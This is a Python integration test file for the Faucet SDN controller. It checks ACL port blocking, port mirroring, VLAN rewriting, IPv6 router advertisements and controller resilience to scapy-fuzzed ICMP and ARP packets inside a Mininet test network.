class FaucetUntaggedIPv4LACPMismatchTest(FaucetUntaggedIPv4LACPTest):
"""Ensure remote LACP system ID mismatch is logged."""
def test_untagged(self):
first_host = self.hosts_name_ordered()[0]
orig_ip = first_host.IP()
switch = self.first_switch()
bond_members = [pair[0].name for pair in first_host.connectionsTo(switch)]
for i, bond_member in enumerate(bond_members):
bond = 'bond%u' % i
self.quiet_commands(first_host, (
'ip link set %s down' % bond_member,
'ip address flush dev %s' % bond_member,
('ip link add %s address 0e:00:00:00:00:%2.2x '
'type bond mode 802.3ad lacp_rate fast miimon 100') % (bond, i * 2 + i),
'ip add add %s/24 dev %s' % (orig_ip, bond),
'ip link set %s up' % bond,
'ip link set dev %s master %s' % (bond_member, bond)))
self.wait_until_matching_lines_from_faucet_log_files(r'.+actor system mismatch.+')
class FaucetUntaggedIPv4ControlPlaneFuzzTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["10.0.0.254/24"]
"""
CONFIG = """
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
def test_ping_fragment_controller(self):
first_host = self.hosts_name_ordered()[0]
first_host.cmd('ping -s 1476 -c 3 %s' % self.FAUCET_VIPV4.ip)
self.one_ipv4_controller_ping(first_host)
def test_fuzz_controller(self):
first_host = self.hosts_name_ordered()[0]
self.one_ipv4_controller_ping(first_host)
packets = 1000
fuzz_template = 'python3 -c \"from scapy.all import * ; scapy.all.send(%s, count=%u)\"'
for fuzz_cmd in (
fuzz_template % ('IP(dst=\'%s\')/fuzz(%s(type=0))' % (self.FAUCET_VIPV4.ip, 'ICMP'), packets),
fuzz_template % ('IP(dst=\'%s\')/fuzz(%s(type=8))' % (self.FAUCET_VIPV4.ip, 'ICMP'), packets),
fuzz_template % ('fuzz(%s(pdst=\'%s\'))' % ('ARP', self.FAUCET_VIPV4.ip), packets)):
fuzz_out = first_host.cmd(mininet_test_util.timeout_cmd(fuzz_cmd, 180))
self.assertTrue(
re.search('Sent %u packets' % packets, fuzz_out), msg='%s: %s' % (
fuzz_cmd, fuzz_out))
self.one_ipv4_controller_ping(first_host)
def test_flap_ping_controller(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
for _ in range(5):
self.one_ipv4_ping(first_host, second_host.IP())
for host in first_host, second_host:
self.one_ipv4_controller_ping(host)
self.flap_all_switch_ports()
class FaucetUntaggedIPv4ControlPlaneTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["10.0.0.254/24"]
"""
CONFIG = """
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
def test_fping_controller(self):
first_host = self.hosts_name_ordered()[0]
self.one_ipv4_controller_ping(first_host)
# Try 64 byte icmp packets
self.verify_controller_fping(first_host, self.FAUCET_VIPV4)
# Try 128 byte icmp packets
self.verify_controller_fping(first_host, self.FAUCET_VIPV4, size=128)
class FaucetUntaggedIPv6RATest(FaucetUntaggedTest):
FAUCET_MAC = "0e:00:00:00:00:99"
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["fe80::1:254/64", "fc00::1:254/112", "fc00::2:254/112", "10.0.0.254/24"]
faucet_mac: "%s"
""" % FAUCET_MAC
CONFIG = """
advertise_interval: 5
""" + CONFIG_BOILER_UNTAGGED
def test_ndisc6(self):
first_host = self.hosts_name_ordered()[0]
for vip in ('fe80::1:254', 'fc00::1:254', 'fc00::2:254'):
self.assertEqual(
self.FAUCET_MAC.upper(),
first_host.cmd('ndisc6 -q %s %s' % (vip, first_host.defaultIntf())).strip())
def test_rdisc6(self):
first_host = self.hosts_name_ordered()[0]
rdisc6_results = sorted(list(set(first_host.cmd(
'rdisc6 -q %s' % first_host.defaultIntf()).splitlines())))
self.assertEqual(
['fc00::1:0/112', 'fc00::2:0/112'],
rdisc6_results)
def test_ra_advertise(self):
first_host = self.hosts_name_ordered()[0]
tcpdump_filter = ' and '.join((
'ether dst 33:33:00:00:00:01',
'ether src %s' % self.FAUCET_MAC,
'icmp6',
'ip6[40] == 134',
'ip6 host fe80::1:254'))
tcpdump_txt = self.tcpdump_helper(
first_host, tcpdump_filter, [], timeout=30, vflags='-vv', packets=1)
for ra_required in (
r'ethertype IPv6 \(0x86dd\), length 142',
r'fe80::1:254 > ff02::1:.+ICMP6, router advertisement',
r'fc00::1:0/112, Flags \[onlink, auto\]',
r'fc00::2:0/112, Flags \[onlink, auto\]',
r'source link-address option \(1\), length 8 \(1\): %s' % self.FAUCET_MAC):
self.assertTrue(
re.search(ra_required, tcpdump_txt),
msg='%s: %s' % (ra_required, tcpdump_txt))
def test_rs_reply(self):
first_host = self.hosts_name_ordered()[0]
tcpdump_filter = ' and '.join((
'ether src %s' % self.FAUCET_MAC,
'ether dst %s' % first_host.MAC(),
'icmp6',
'ip6[40] == 134',
'ip6 host fe80::1:254'))
tcpdump_txt = self.tcpdump_helper(
first_host, tcpdump_filter, [
lambda: first_host.cmd(
'rdisc6 -1 %s' % first_host.defaultIntf())],
timeout=30, vflags='-vv', packets=1)
for ra_required in (
r'fe80::1:254 > fe80::.+ICMP6, router advertisement',
r'fc00::1:0/112, Flags \[onlink, auto\]',
r'fc00::2:0/112, Flags \[onlink, auto\]',
r'source link-address option \(1\), length 8 \(1\): %s' % self.FAUCET_MAC):
self.assertTrue(
re.search(ra_required, tcpdump_txt),
msg='%s: %s (%s)' % (ra_required, tcpdump_txt, tcpdump_filter))
class FaucetUntaggedIPv6ControlPlaneFuzzTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["fc00::1:254/112"]
"""
CONFIG = """
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
def test_flap_ping_controller(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
self.add_host_ipv6_address(first_host, 'fc00::1:1/112')
self.add_host_ipv6_address(second_host, 'fc00::1:2/112')
for _ in range(5):
self.one_ipv6_ping(first_host, 'fc00::1:2')
for host in first_host, second_host:
self.one_ipv6_controller_ping(host)
self.flap_all_switch_ports()
def test_fuzz_controller(self):
first_host = self.hosts_name_ordered()[0]
self.add_host_ipv6_address(first_host, 'fc00::1:1/112')
self.one_ipv6_controller_ping(first_host)
fuzz_success = False
packets = 1000
count = 0
abort = False
def note(*args):
error('%s:' % self._test_name(), *args + tuple('\n'))
# Some of these tests have been slowing down and timing out,
# So this code is intended to allow some debugging and analysis
for fuzz_class in dir(scapy.all):
if fuzz_class.startswith('ICMPv6'):
fuzz_cmd = ("from scapy.all import * ;"
"scapy.all.send(IPv6(dst='%s')/fuzz(%s()),count=%u)" %
(self.FAUCET_VIPV6.ip, fuzz_class, packets))
out, start, too_long = '', time.time(), 30 # seconds
popen = first_host.popen('python3', '-c', fuzz_cmd)
for _, line in pmonitor({first_host: popen}):
out += line
if time.time() - start > too_long:
note('stopping', fuzz_class, 'after >', too_long, 'seconds')
note('output was:', out)
popen.terminate()
abort = True
break
popen.wait()
if 'Sent %u packets' % packets in out:
count += packets
elapsed = time.time() - start
note('sent', packets, fuzz_class, 'packets in %.2fs' % elapsed)
fuzz_success = True
if abort:
break
note('successfully sent', count, 'packets')
self.assertTrue(fuzz_success)
note('pinging', first_host)
self.one_ipv6_controller_ping(first_host)
note('test_fuzz_controller() complete')
class FaucetUntaggedIPv6ControlPlaneTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["fc00::1:254/112"]
"""
CONFIG = """
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
def test_fping_controller(self):
first_host = self.hosts_name_ordered()[0]
self.add_host_ipv6_address(first_host, 'fc00::1:1/112')
self.one_ipv6_controller_ping(first_host)
# Try 64 byte icmp6 packets
self.verify_controller_fping(first_host, self.FAUCET_VIPV6)
# Try 128 byte icmp6 packets
self.verify_controller_fping(first_host, self.FAUCET_VIPV6, size=128)
class FaucetTaggedAndUntaggedDiffVlanTest(FaucetTest):
N_TAGGED = 2
N_UNTAGGED = 4
LINKS_PER_HOST = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
101:
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
native_vlan: 101
%(port_4)d:
native_vlan: 101
"""
def setUp(self):
super().setUp()
self.topo = self.topo_class(
self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
n_tagged=2, n_untagged=2, links_per_host=self.LINKS_PER_HOST,
hw_dpid=self.hw_dpid)
self.start_net()
def test_separate_untagged_tagged(self):
tagged_host_pair = self.hosts_name_ordered()[:2]
untagged_host_pair = self.hosts_name_ordered()[2:]
self.verify_vlan_flood_limited(
tagged_host_pair[0], tagged_host_pair[1], untagged_host_pair[0])
self.verify_vlan_flood_limited(
untagged_host_pair[0], untagged_host_pair[1], tagged_host_pair[0])
# hosts within VLANs can ping each other
self.retry_net_ping(hosts=tagged_host_pair)
self.retry_net_ping(hosts=untagged_host_pair)
# hosts cannot ping hosts in other VLANs
self.assertEqual(
100, self.ping([tagged_host_pair[0], untagged_host_pair[0]]))
class FaucetUntaggedACLTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5002
actions:
allow: 1
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5001
actions:
allow: 0
- rule:
actions:
allow: 1
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_port5001_blocked(self):
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_blocked(5001, first_host, second_host)
def test_port5002_notblocked(self):
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_notblocked(5002, first_host, second_host)
class FaucetUntaggedEgressACLTest(FaucetUntaggedTest):
REQUIRES_METADATA = True
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acl_out: 1
acls:
1:
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5002
actions:
allow: 1
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5001
actions:
allow: 0
- rule:
actions:
allow: 1
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_port5001_blocked(self):
egress_acl_table = self.scrape_prometheus_var(
'faucet_config_table_names',
labels={'table_name': 'egress_acl'}
)
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_blocked(
5001, first_host, second_host, table_id=egress_acl_table)
self.ping_all_when_learned()
self.verify_tp_dst_blocked(
5001, first_host, second_host, table_id=egress_acl_table)
def test_port5002_notblocked(self):
egress_acl_table = self.scrape_prometheus_var(
'faucet_config_table_names',
labels={'table_name': 'egress_acl'}
)
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_notblocked(
5002, first_host, second_host, table_id=egress_acl_table)
class FaucetUntaggedDPACLTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5002
actions:
allow: 1
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5001
actions:
allow: 0
- rule:
actions:
allow: 1
"""
CONFIG = """
dp_acls: [1]
""" + CONFIG_BOILER_UNTAGGED
def test_port5001_blocked(self):
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_blocked(5001, first_host, second_host)
def test_port5002_notblocked(self):
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_notblocked(5002, first_host, second_host)
class FaucetUntaggedNoReconfACLTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5001
actions:
allow: 0
- rule:
actions:
allow: 1
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
opstatus_reconf: False
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
matches = {
'in_port': int(self.port_map['port_1']),
'tcp_dst': 5001,
'eth_type': IPV4_ETH,
'ip_proto': 6}
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_blocked(5001, first_host, second_host)
self.wait_until_matching_flow(
matches, table_id=self._PORT_ACL_TABLE, actions=[])
self.set_port_down(self.port_map['port_1'])
self.wait_until_matching_flow(
matches, table_id=self._PORT_ACL_TABLE, actions=[])
self.set_port_up(self.port_map['port_1'])
self.ping_all_when_learned()
self.verify_tp_dst_blocked(5001, first_host, second_host)
self.wait_until_matching_flow(
matches, table_id=self._PORT_ACL_TABLE, actions=[])
class FaucetUntaggedACLTcpMaskTest(FaucetUntaggedACLTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5002
actions:
allow: 1
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5001
actions:
allow: 0
- rule:
dl_type: 0x800
ip_proto: 6
# Match packets > 1023
tcp_dst: 1024/1024
actions:
allow: 0
- rule:
actions:
allow: 1
"""
def test_port_gt1023_blocked(self):
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_blocked(1024, first_host, second_host, mask=1024)
self.verify_tp_dst_notblocked(1023, first_host, second_host, table_id=None)
class FaucetUntaggedVLANACLTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
acls:
1:
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5001
actions:
allow: 0
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5002
actions:
allow: 1
- rule:
actions:
allow: 1
vlans:
100:
description: "untagged"
acl_in: 1
"""
CONFIG = CONFIG_BOILER_UNTAGGED
def test_port5001_blocked(self):
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_blocked(
5001, first_host, second_host, table_id=self._VLAN_ACL_TABLE)
def test_port5002_notblocked(self):
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_notblocked(
5002, first_host, second_host, table_id=self._VLAN_ACL_TABLE)
class FaucetUntaggedOutputOnlyTest(FaucetUntaggedTest):
CONFIG = """
interfaces:
%(port_1)d:
output_only: True
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
self.wait_until_matching_flow(
{'in_port': int(self.port_map['port_1'])},
table_id=self._VLAN_TABLE,
actions=[])
first_host, second_host, third_host = self.hosts_name_ordered()[:3]
self.assertEqual(100.0, self.ping((first_host, second_host)))
self.assertEqual(0, self.ping((third_host, second_host)))
class FaucetUntaggedACLMirrorTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
actions:
allow: 1
mirror: %(port_3)d
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
acl_in: 1
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host, mirror_host = self.hosts_name_ordered()[0:3]
self.verify_ping_mirrored(first_host, second_host, mirror_host)
def test_eapol_mirrored(self):
first_host, second_host, mirror_host = self.hosts_name_ordered()[0:3]
self.verify_eapol_mirrored(first_host, second_host, mirror_host)
class FaucetUntaggedACLOutputMirrorTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
actions:
allow: 1
output:
ports: [%(port_3)d]
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
acl_in: 1
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host, mirror_host = self.hosts_name_ordered()[0:3]
self.verify_ping_mirrored(first_host, second_host, mirror_host)
class FaucetUntaggedOrderedACLOutputMirrorTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
actions:
allow: 1
output:
- ports: [%(port_3)d]
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
acl_in: 1
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host, mirror_host = self.hosts_name_ordered()[0:3]
self.verify_ping_mirrored(first_host, second_host, mirror_host)
class FaucetUntaggedACLMirrorDefaultAllowTest(FaucetUntaggedACLMirrorTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
actions:
mirror: %(port_3)d
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
acl_in: 1
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
class FaucetMultiOutputTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
200:
acls:
multi_out:
- rule:
actions:
output:
ports: [%(port_2)d, %(port_3)d]
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: multi_out
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 200
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host, third_host, fourth_host = self.hosts_name_ordered()[0:4]
tcpdump_filter = ('icmp')
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))])
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
tcpdump_txt = self.tcpdump_helper(
third_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (third_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, third_host.IP())))])
self.assertTrue(re.search(
'%s: ICMP echo request' % third_host.IP(), tcpdump_txt))
tcpdump_txt = self.tcpdump_helper(
fourth_host, tcpdump_filter, [
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, fourth_host.IP())))])
self.assertFalse(re.search(
'%s: ICMP echo request' % fourth_host.IP(), tcpdump_txt))
class FaucetMultiOrderedOutputTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
200:
acls:
multi_out:
- rule:
actions:
output:
- ports: [%(port_2)d, %(port_3)d]
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: multi_out
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 200
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host, third_host, fourth_host = self.hosts_name_ordered()[0:4]
tcpdump_filter = ('icmp')
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))])
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
tcpdump_txt = self.tcpdump_helper(
third_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (third_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, third_host.IP())))])
self.assertTrue(re.search(
'%s: ICMP echo request' % third_host.IP(), tcpdump_txt))
tcpdump_txt = self.tcpdump_helper(
fourth_host, tcpdump_filter, [
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, fourth_host.IP())))])
self.assertFalse(re.search(
'%s: ICMP echo request' % fourth_host.IP(), tcpdump_txt))
class FaucetUntaggedOutputTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
dl_dst: "01:02:03:04:05:06"
actions:
output:
vlan_vid: 123
set_fields:
- eth_dst: "06:06:06:06:06:06"
port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
# we expected to see the rewritten address and VLAN
tcpdump_filter = ('icmp and ether dst 06:06:06:06:06:06')
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))])
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
self.assertTrue(re.search(
'vlan 123', tcpdump_txt))
class FaucetUntaggedOrderedOutputTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
dl_dst: "01:02:03:04:05:06"
actions:
output:
- vlan_vid: 123
- set_fields:
- eth_dst: "06:06:06:06:06:06"
- port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
# we expected to see the rewritten address and VLAN
tcpdump_filter = ('icmp and ether dst 06:06:06:06:06:06')
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))])
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
self.assertTrue(re.search(
'vlan 123', tcpdump_txt))
class FaucetUntaggedMultiVlansOutputTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
dl_dst: "01:02:03:04:05:06"
actions:
output:
set_fields:
- eth_dst: "06:06:06:06:06:06"
vlan_vids: [123, 456]
port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
# we expected to see the rewritten address and VLAN
tcpdump_filter = 'vlan'
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))])
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
self.assertTrue(re.search(
'vlan 456.+vlan 123', tcpdump_txt))
class FaucetUntaggedMultiVlansOrderedOutputTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
dl_dst: "01:02:03:04:05:06"
actions:
output:
- set_fields:
- eth_dst: "06:06:06:06:06:06"
- vlan_vids: [123, 456]
- port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
# we expected to see the rewritten address and VLAN
tcpdump_filter = 'vlan'
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))])
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
self.assertTrue(re.search(
'vlan 456.+vlan 123', tcpdump_txt))
class FaucetUntaggedMultiConfVlansOutputTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
dl_dst: "01:02:03:04:05:06"
actions:
output:
set_fields:
- eth_dst: "06:06:06:06:06:06"
vlan_vids: [{vid: 123, eth_type: 0x88a8}, 456]
port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
# we expected to see the rewritten address and VLAN
tcpdump_filter = 'ether proto 0x88a8'
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
packets=1)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt), msg=tcpdump_txt)
self.assertTrue(re.search(
r'vlan 456.+ethertype 802\.1Q-QinQ \(0x88a8\), vlan 123', tcpdump_txt), msg=tcpdump_txt)
class FaucetUntaggedMultiConfVlansOrderedOutputTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
dl_dst: "01:02:03:04:05:06"
actions:
output:
- set_fields:
- eth_dst: "06:06:06:06:06:06"
- vlan_vids: [{vid: 123, eth_type: 0x88a8}, 456]
- port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
# we expected to see the rewritten address and VLAN
tcpdump_filter = 'ether proto 0x88a8'
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
packets=1)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt), msg=tcpdump_txt)
self.assertTrue(re.search(
r'vlan 456.+ethertype 802\.1Q-QinQ \(0x88a8\), vlan 123', tcpdump_txt), msg=tcpdump_txt)
class FaucetUntaggedMirrorTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
output_only: True
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host, mirror_host = self.hosts_name_ordered()[0:3]
first_host_ip = ipaddress.ip_address(first_host.IP())
second_host_ip = ipaddress.ip_address(second_host.IP())
self.flap_all_switch_ports()
# Add mirror, test performance.
self.change_port_config(
self.port_map['port_3'], 'mirror', self.port_map['port_1'],
restart=True, cold_start=False)
self.verify_ping_mirrored(first_host, second_host, mirror_host)
self.verify_bcast_ping_mirrored(first_host, second_host, mirror_host)
self.verify_iperf_min(
((first_host, self.port_map['port_1']),
(second_host, self.port_map['port_2'])),
MIN_MBPS, first_host_ip, second_host_ip,
sync_counters_func=lambda: self.one_ipv4_ping(first_host, second_host_ip))
# Remove mirror, test performance.
self.change_port_config(
self.port_map['port_3'], 'mirror', [],
restart=True, cold_start=False)
self.verify_iperf_min(
((first_host, self.port_map['port_1']),
(second_host, self.port_map['port_2'])),
MIN_MBPS, first_host_ip, second_host_ip,
sync_counters_func=lambda: self.one_ipv4_ping(first_host, second_host_ip))
class FaucetUntaggedMultiMirrorTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
output_only: True
%(port_4)d:
output_only: True
"""
def test_untagged(self):
first_host, second_host, mirror_host = self.hosts_name_ordered()[:3]
ping_pairs = (
(first_host, second_host),
(second_host, first_host))
self.flap_all_switch_ports()
self.change_port_config(
self.port_map['port_3'], 'mirror',
[self.port_map['port_1'], self.port_map['port_2']],
restart=True, cold_start=False, hup=True)
self.verify_ping_mirrored_multi(
ping_pairs, mirror_host, both_mirrored=True)
class FaucetUntaggedMultiMirrorSepTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
mirror: %(port_1)d
%(port_4)d:
mirror: %(port_1)d
"""
def test_untagged(self):
self.flap_all_switch_ports()
# Make sure the two hosts both mirror from port 1
first_host, second_host = self.hosts_name_ordered()[0:2]
mirror_host = self.hosts_name_ordered()[2]
self.verify_ping_mirrored(first_host, second_host, mirror_host)
